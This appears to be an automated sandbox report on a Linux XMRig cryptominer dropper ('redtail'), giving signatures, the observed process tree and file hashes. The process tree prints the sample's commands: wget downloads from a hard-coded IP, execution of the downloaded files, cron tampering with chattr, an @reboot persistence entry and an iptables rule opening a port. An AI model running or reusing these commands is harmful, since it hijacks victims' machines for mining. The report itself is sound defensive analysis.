Analysis

  • max time kernel
    150s
  • max time network
    154s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    09-11-2024 22:53

General

  • Target

    63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446

  • Size

    1KB

  • MD5

    1bf0e6d92f2e0ef621ceeb072eed6b11

  • SHA1

    6cce0a196ec3af2df1cd9d38b053ac159add344b

  • SHA256

    63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446

  • SHA512

    e922ba2c485d302e5b64d7f25249e464cd5c8579a780ce8f6750aad798add89ad43097655980068eef707144ec1ba17fa7a21651b140b51cbc607beee4e90656

Malware Config

Signatures

  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (50691) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • XMRig Miner payload 1 IoCs
  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 1 IoCs
  • Attempts to change immutable files 24 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads network interface configuration 2 TTPs 6 IoCs

    Fetches information about one or more active network interfaces.

  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Changes its process name 1 IoCs
  • Checks CPU configuration 1 TTPs 1 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 27 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
    /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
    1⤵
      PID:660
      • /bin/cat
        cat /proc/mounts
        2⤵
          PID:668
        • /bin/grep
          grep noexec
          2⤵
            PID:669
          • /usr/bin/awk
            awk "{print \$2}"
            2⤵
              PID:670
            • /usr/bin/whoami
              whoami
              2⤵
                PID:676
              • /usr/bin/find
                find / -type d -user root -perm "-u=rwx" -not -path "/tmp/*" -not -path "/proc/*" -not -path /sys -not -path "/sys/*" -not -path /proc -not -path "/proc/*" -not -path /dev/pts -not -path "/dev/pts/*" -not -path /run -not -path "/run/*" -not -path /sys/kernel/security -not -path "/sys/kernel/security/*" -not -path /run/lock -not -path "/run/lock/*" -not -path /sys/fs/cgroup -not -path "/sys/fs/cgroup/*" -not -path /sys/fs/cgroup/systemd -not -path "/sys/fs/cgroup/systemd/*" -not -path /sys/fs/cgroup/devices -not -path "/sys/fs/cgroup/devices/*" -not -path "/sys/fs/cgroup/net_cls,net_prio" -not -path "/sys/fs/cgroup/net_cls,net_prio/*" -not -path /sys/fs/cgroup/pids -not -path "/sys/fs/cgroup/pids/*" -not -path "/sys/fs/cgroup/cpu,cpuacct" -not -path "/sys/fs/cgroup/cpu,cpuacct/*" -not -path /sys/fs/cgroup/perf_event -not -path "/sys/fs/cgroup/perf_event/*" -not -path /sys/fs/cgroup/freezer -not -path "/sys/fs/cgroup/freezer/*" -not -path /sys/fs/cgroup/blkio -not -path "/sys/fs/cgroup/blkio/*" -not -path /sys/fs/cgroup/memory -not -path "/sys/fs/cgroup/memory/*" -not -path /sys/fs/cgroup/cpuset -not -path "/sys/fs/cgroup/cpuset/*"
                2⤵
                • Reads network interface configuration
                • Reads CPU attributes
                • Enumerates kernel/hardware configuration
                • Reads runtime system information
                PID:678
              • /bin/uname
                uname -mp
                2⤵
                  PID:788
                • /usr/bin/touch
                  touch .testfile
                  2⤵
                    PID:789
                  • /bin/dd
                    dd "if=/dev/zero" "of=.testfile2" "bs=2M" "count=1"
                    2⤵
                      PID:791
                    • /bin/rm
                      rm -rf .testfile .testfile2
                      2⤵
                        PID:792
                      • /usr/bin/wget
                        wget http://154.216.17.208/clean
                        2⤵
                          PID:793
                        • /bin/chmod
                          chmod +x clean
                          2⤵
                          • File and Directory Permissions Modification
                          PID:794
                        • /bin/sh
                          sh clean
                          2⤵
                          • Writes file to tmp directory
                          PID:795
                          • /bin/systemctl
                            systemctl disable c3pool_miner
                            3⤵
                              PID:796
                            • /bin/systemctl
                              systemctl stop c3pool_miner
                              3⤵
                                PID:797
                              • /usr/bin/chattr
                                chattr -ia /var/spool/cron/crontabs
                                3⤵
                                • Attempts to change immutable files
                                PID:798
                              • /usr/bin/chattr
                                chattr -ia /etc/crontab
                                3⤵
                                • Attempts to change immutable files
                                PID:799
                              • /bin/grep
                                grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/crontab
                                3⤵
                                • Attempts to change immutable files
                                PID:800
                              • /bin/mv
                                mv /tmp/clean_crontab /etc/crontab
                                3⤵
                                  PID:801
                                • /usr/bin/chattr
                                  chattr -ia /etc/cron.hourly
                                  3⤵
                                  • Attempts to change immutable files
                                  PID:802
                                • /usr/bin/chattr
                                  chattr -ia /etc/cron.daily
                                  3⤵
                                  • Attempts to change immutable files
                                  PID:803
                                • /usr/bin/chattr
                                  chattr -ia /etc/cron.daily/apt-compat
                                  3⤵
                                  • Attempts to change immutable files
                                  PID:804
                                • /bin/grep
                                  grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/apt-compat
                                  3⤵
                                  • Attempts to change immutable files
                                  PID:805
                                • /bin/mv
                                  mv /tmp/clean_crontab /etc/cron.daily/apt-compat
                                  3⤵
                                    PID:806
                                  • /usr/bin/chattr
                                    chattr -ia /etc/cron.daily/bsdmainutils
                                    3⤵
                                    • Attempts to change immutable files
                                    PID:807
                                  • /bin/grep
                                    grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/bsdmainutils
                                    3⤵
                                    • Attempts to change immutable files
                                    PID:808
                                  • /bin/mv
                                    mv /tmp/clean_crontab /etc/cron.daily/bsdmainutils
                                    3⤵
                                      PID:809
                                    • /usr/bin/chattr
                                      chattr -ia /etc/cron.daily/dpkg
                                      3⤵
                                      • Attempts to change immutable files
                                      PID:810
                                    • /bin/grep
                                      grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/dpkg
                                      3⤵
                                      • Attempts to change immutable files
                                      PID:811
                                    • /bin/mv
                                      mv /tmp/clean_crontab /etc/cron.daily/dpkg
                                      3⤵
                                        PID:812
                                      • /usr/bin/chattr
                                        chattr -ia /etc/cron.daily/exim4-base
                                        3⤵
                                        • Attempts to change immutable files
                                        PID:813
                                      • /bin/grep
                                        grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/exim4-base
                                        3⤵
                                        • Attempts to change immutable files
                                        PID:814
                                      • /bin/mv
                                        mv /tmp/clean_crontab /etc/cron.daily/exim4-base
                                        3⤵
                                          PID:815
                                        • /usr/bin/chattr
                                          chattr -ia /etc/cron.daily/logrotate
                                          3⤵
                                          • Attempts to change immutable files
                                          PID:816
                                        • /bin/grep
                                          grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/logrotate
                                          3⤵
                                          • Attempts to change immutable files
                                          PID:817
                                        • /bin/mv
                                          mv /tmp/clean_crontab /etc/cron.daily/logrotate
                                          3⤵
                                            PID:818
                                          • /usr/bin/chattr
                                            chattr -ia /etc/cron.daily/passwd
                                            3⤵
                                            • Attempts to change immutable files
                                            PID:819
                                          • /bin/grep
                                            grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/cron.daily/passwd
                                            3⤵
                                            • Attempts to change immutable files
                                            PID:820
                                          • /bin/mv
                                            mv /tmp/clean_crontab /etc/cron.daily/passwd
                                            3⤵
                                              PID:821
                                            • /usr/bin/chattr
                                              chattr -ia /etc/cron.weekly
                                              3⤵
                                              • Attempts to change immutable files
                                              PID:822
                                            • /usr/bin/chattr
                                              chattr -ia /etc/cron.monthly
                                              3⤵
                                              • Attempts to change immutable files
                                              PID:823
                                            • /usr/bin/chattr
                                              chattr -ia /etc/cron.d
                                              3⤵
                                              • Attempts to change immutable files
                                              PID:824
                                            • /usr/bin/chattr
                                              chattr -ia /etc/anacrontab
                                              3⤵
                                              • Attempts to change immutable files
                                              PID:825
                                            • /bin/grep
                                              grep -vE "wget|curl|/dev/tcp|/tmp|\\.sh|nc|bash -i|sh -i|base64 -d" /etc/anacrontab
                                              3⤵
                                              • Attempts to change immutable files
                                              PID:826
                                            • /bin/mv
                                              mv /tmp/clean_crontab /etc/anacrontab
                                              3⤵
                                                PID:827
                                              • /bin/rm
                                                rm -rf /tmp/63356ecacc71f1a4267dd00dbd4769be86c255cfa267658ad6e1e6bd7bf80446
                                                3⤵
                                                  PID:828
                                                • /bin/rm
                                                  rm -rf "/var/tmp/*"
                                                  3⤵
                                                    PID:829
                                                  • /bin/rm
                                                    rm -rf "/dev/shm/*"
                                                    3⤵
                                                      PID:830
                                                  • /bin/rm
                                                    rm -rf clean
                                                    2⤵
                                                      PID:831
                                                    • /bin/rm
                                                      rm -rf .redtail
                                                      2⤵
                                                        PID:832
                                                      • /bin/grep
                                                        grep -q x86_64
                                                        2⤵
                                                          PID:834
                                                        • /bin/grep
                                                          grep -q amd64
                                                          2⤵
                                                            PID:836
                                                          • /bin/grep
                                                            grep -q "i[3456]86"
                                                            2⤵
                                                              PID:840
                                                            • /bin/grep
                                                              grep -q armv8
                                                              2⤵
                                                                PID:842
                                                              • /bin/grep
                                                                grep -q aarch64
                                                                2⤵
                                                                  PID:844
                                                                • /bin/grep
                                                                  grep -q armv7
                                                                  2⤵
                                                                    PID:846
                                                                  • /usr/bin/wget
                                                                    wget http://154.216.17.208/arm7
                                                                    2⤵
                                                                      PID:847
                                                                    • /bin/mv
                                                                      mv arm7 .redtail
                                                                      2⤵
                                                                        PID:848
                                                                      • /bin/chmod
                                                                        chmod +x .redtail
                                                                        2⤵
                                                                        • File and Directory Permissions Modification
                                                                        PID:849
                                                                      • /.redtail
                                                                        ./.redtail
                                                                        2⤵
                                                                        • Executes dropped EXE
                                                                        • Changes its process name
                                                                        • Checks CPU configuration
                                                                        • Reads CPU attributes
                                                                        • Reads runtime system information
                                                                        PID:850
                                                                        • /bin/sh
                                                                          sh -c "command -v crontab >/dev/null 2>&1"
                                                                          3⤵
                                                                            PID:852
                                                                          • /bin/sh
                                                                            sh -c "crontab -r >/dev/null 2>&1; echo \"@reboot /.redtail\" | crontab -"
                                                                            3⤵
                                                                              PID:853
                                                                              • /usr/bin/crontab
                                                                                crontab -r
                                                                                4⤵
                                                                                  PID:854
                                                                                • /usr/bin/crontab
                                                                                  crontab -
                                                                                  4⤵
                                                                                  • Creates/modifies Cron job
                                                                                  PID:856
                                                                              • /bin/sh
                                                                                sh -c "command -v php >/dev/null 2>&1"
                                                                                3⤵
                                                                                  PID:857
                                                                                • /bin/sh
                                                                                  sh -c "command -v nginx >/dev/null 2>&1"
                                                                                  3⤵
                                                                                    PID:858
                                                                                  • /bin/sh
                                                                                    sh -c "which apache2"
                                                                                    3⤵
                                                                                      PID:859
                                                                                      • /usr/bin/which
                                                                                        which apache2
                                                                                        4⤵
                                                                                          PID:860
                                                                                      • /bin/sh
                                                                                        sh -c "which httpd"
                                                                                        3⤵
                                                                                          PID:861
                                                                                          • /usr/bin/which
                                                                                            which httpd
                                                                                            4⤵
                                                                                              PID:862
                                                                                          • /bin/sh
                                                                                            sh -c "iptables -I INPUT -p tcp --dport 36239 -j ACCEPT >/dev/null 2>&1"
                                                                                            3⤵
                                                                                            • Attempts to change immutable files
                                                                                            PID:864
                                                                                            • /sbin/iptables
                                                                                              iptables -I INPUT -p tcp --dport 36239 -j ACCEPT
                                                                                              4⤵
                                                                                              • Attempts to change immutable files
                                                                                              PID:865

                                                                                      Network

                                                                                      MITRE ATT&CK Enterprise v15

                                                                                      Replay Monitor

                                                                                      Loading Replay Monitor...

                                                                                      Downloads

                                                                                      • /.testfile2

                                                                                        Filesize

                                                                                        2.0MB

                                                                                        MD5

                                                                                        b2d1236c286a3c0704224fe4105eca49

                                                                                        SHA1

                                                                                        7d76d48d64d7ac5411d714a4bb83f37e3e5b8df6

                                                                                        SHA256

                                                                                        5647f05ec18958947d32874eeb788fa396a05d0bab7c1b71f112ceb7e9b31eee

                                                                                        SHA512

                                                                                        731859029215873fdac1c9f2f8bd25a334abf0f3a9e1b057cf2cacc2826d86b0c26a3fa920a936421401c0471f38857cb53ba905489ea46b185209fdff65b3b6

                                                                                      • /arm7

                                                                                        Filesize

                                                                                        1.1MB

                                                                                        MD5

                                                                                        045daa66263bfd467051c013e9222faf

                                                                                        SHA1

                                                                                        4b943b14526d7bf7be2b3e3f9af24d1f35015548

                                                                                        SHA256

                                                                                        d4635f0f5ab84af5e5194453dbf60eaebf6ec47d3675cb5044e5746fb48bd4b4

                                                                                        SHA512

                                                                                        bd684e0909793c05a34891f2ffe289e00b66c634d8059a9301274ef764aff38ae6d5c0c224228d11007b297e32e00749b40197f77f7fc48c44c50ef3651bc41f

                                                                                      • /clean

                                                                                        Filesize

                                                                                        795B

                                                                                        MD5

                                                                                        397ff5e54194072e6d8a44a0d8cc1b27

                                                                                        SHA1

                                                                                        42477b0c3b277b5e907b0a35c644f3291ed30a63

                                                                                        SHA256

                                                                                        d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e

                                                                                        SHA512

                                                                                        ff40c129e3b2891ae280bce97e52ee69aea18ca60ea7901f7efd4cf11d3bf1c4ee48e9eb90e5f045e080ab784ee2a9942c2bcf0a531b7f4602931f63c4b32d74

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        30e858769aacd9cc309502f8d5c6aa0f

                                                                                        SHA1

                                                                                        927c06dd4d6cbb5ca02e9505011c8667c47f2d6e

                                                                                        SHA256

                                                                                        eff406c0943e1399e3e15fdb6ca2893a187d6b273f5bd9d17eec4e4b4c52b8cd

                                                                                        SHA512

                                                                                        f7f6e70925afe54fc2fdaae13a750b3c49fde9fa59d80af321885d270112ebb2291f034037708f1ba8515f3e3e1ca0a493cd1e002895aa699c469e0365ccde3c

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        3KB

                                                                                        MD5

                                                                                        02f33c9e59b27bcd241e488cd48de072

                                                                                        SHA1

                                                                                        9247eee9b2310d56455beccf41c577ba16b78e3d

                                                                                        SHA256

                                                                                        2565ab0cb86a8cb7fd37a0401ad22624da886b8df9130a5bd4b566f404130c14

                                                                                        SHA512

                                                                                        1eda274264320a72cd58462b6c8a7747990a7eedf836be730b51b92ea6b04a1005aed596f9b9d53c4c8a93001d112450d0c6d83dfe4eee4b91a671623662fb3d

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        249B

                                                                                        MD5

                                                                                        db990990933b6f56322725223f13c2bc

                                                                                        SHA1

                                                                                        387303696a796e27f559c73679e979f2a538072d

                                                                                        SHA256

                                                                                        777a9112ee093d8683645b031eb6cfeb9ce77274f40575c48ff2054ea24114d1

                                                                                        SHA512

                                                                                        a3764e580bcfe0b2100da8ff2a00bed4936cb2acc9985daef52fb0310a7ed3367a1944a355c3f1dbc92d82c82b54280926736f81bc138efb4f7df1814abee3b5

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        722B

                                                                                        MD5

                                                                                        8f111d100ea459f68d333d63a8ef2205

                                                                                        SHA1

                                                                                        077ca9c46a964de67c0f7765745d5c6f9e2065c3

                                                                                        SHA256

                                                                                        0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354

                                                                                        SHA512

                                                                                        d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        1KB

                                                                                        MD5

                                                                                        bc4a71cbcaeed4179f25d798257fa980

                                                                                        SHA1

                                                                                        61445721d0b5d86ac0a8386a4ceef450118f4fbb

                                                                                        SHA256

                                                                                        8eeae3a9df22621d51062e4dadfc5c63b49732b38a37b5d4e52c99c2237e5767

                                                                                        SHA512

                                                                                        709badb4dd1a15a10b34f82d31ed4bbab81698190d2ec94e2ad3dcdc90d97b893eb61cde72f08e517a8beea08ec1d675385fd42a9e77530981b7d83c6bd3548c

                                                                                      • /tmp/clean_crontab

                                                                                        Filesize

                                                                                        279B

                                                                                        MD5

                                                                                        911a774fe040993b929504f3d9415ab3

                                                                                        SHA1

                                                                                        55ccc8e95097f005abf9f4d91a14394e6d0f5da5

                                                                                        SHA256

                                                                                        340dfc483eb79b83b0630b1c0b339e30ebd724ef2f58bb87ba92946472e8e63d

                                                                                        SHA512

                                                                                        1eb8fd8dc6fd444ba2fa3ca7e863894cfb19383e5b20c700ed24aa615402340424d093a761632cf27a3e789ecd548ca972806e154161635da4f97b415d6fc64f

                                                                                      • /var/spool/cron/crontabs/tmp.4FJSDc

                                                                                        Filesize

                                                                                        193B

                                                                                        MD5

                                                                                        3a871a2961731254829f22304aa10132

                                                                                        SHA1

                                                                                        2d2127ff0873b38cecd9f80cccfcd4f11f6199bb

                                                                                        SHA256

                                                                                        71727181c08671a7344860e8ce89a80f3a66a4f348a7f3d4351ea4d383b2003d

                                                                                        SHA512

                                                                                        f8dc9a3fcac9f17233f3a633ac6b06af9274864cae2b03e1656dc6c896ec4266e04b7d4a029ac6a447d2d3efe21c59c9132d83b63d6a9adb1dd538479cbaf7d1

                                                                                      • memory/850-1-0xb6b41000-0xb6ea6454-memory.dmp